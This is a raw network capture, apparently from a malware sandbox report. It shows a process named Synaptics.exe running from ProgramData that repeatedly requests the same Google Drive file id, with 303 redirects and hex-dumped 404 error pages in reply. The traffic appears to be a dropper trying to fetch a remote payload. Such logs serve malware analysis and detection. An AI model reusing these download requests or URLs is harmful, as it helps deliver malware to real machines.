                                                                                                                                      2024-12-30 10:23:40 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:41 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC4492YHstgwuiZknRwSmJSV7jqejVObH0Hn6NAkn15xJhMGgs5hwBlGWx9m6A92nzFSjDvipE0
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:41 GMT
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-flzbECeX3sdxxoTkjvw38w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:41 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                      2024-12-30 10:23:41 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 67 4b 54 4a 74 6b 66 74 43 4e 39 2d 77 4d 43 38 51 65 37 72 73 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="gKTJtkftCN9-wMC8Qe7rsw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                      2024-12-30 10:23:41 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      126192.168.2.550038142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:41 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:41 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:41 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-YFPHBvJElN_1HiXfE07I0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      127192.168.2.550037142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:41 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:41 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:41 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-TVO95XPtFDQVK9k8VlA-XA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      128192.168.2.550045142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:42 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:42 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:42 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-JC49LTlcTYYgekBww-bzqg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      129192.168.2.550044142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:42 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:43 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC5ZD2Cx3DVUFy7nSi6fvDiXKlZOqEp8XFy2m0EWIYYq3qQXurt96-0IMx2ODAc7xohbJ4Krpbo
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:42 GMT
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-c6B9Mpd4k73fAg-RclD3Tw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:43 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                      2024-12-30 10:23:43 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6f 38 41 68 5f 6b 73 51 53 75 39 56 38 55 4f 4d 6b 64 48 34 36 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="o8Ah_ksQSu9V8UOMkdH46Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                      2024-12-30 10:23:43 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      130192.168.2.550047142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:42 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:42 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:42 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-H3RiC8Rv9p8wbXfxlGbCJw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      131192.168.2.550046142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:42 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:43 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC5q5lKU5oBT4DclLz_jqotqnIHT0lBBV6YmTmoTtjlVsfPVzboMSJF3MsSnfWup55O3R63NEnw
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:42 GMT
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-pDT_6tQV4k4bXDX4wpxhpA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:43 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                      2024-12-30 10:23:43 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 54 78 56 49 74 47 75 33 34 4b 30 33 4e 4e 4f 66 42 4e 6f 63 73 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="TxVItGu34K03NNOfBNocsw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                      2024-12-30 10:23:43 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      132192.168.2.550059142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:43 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:44 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
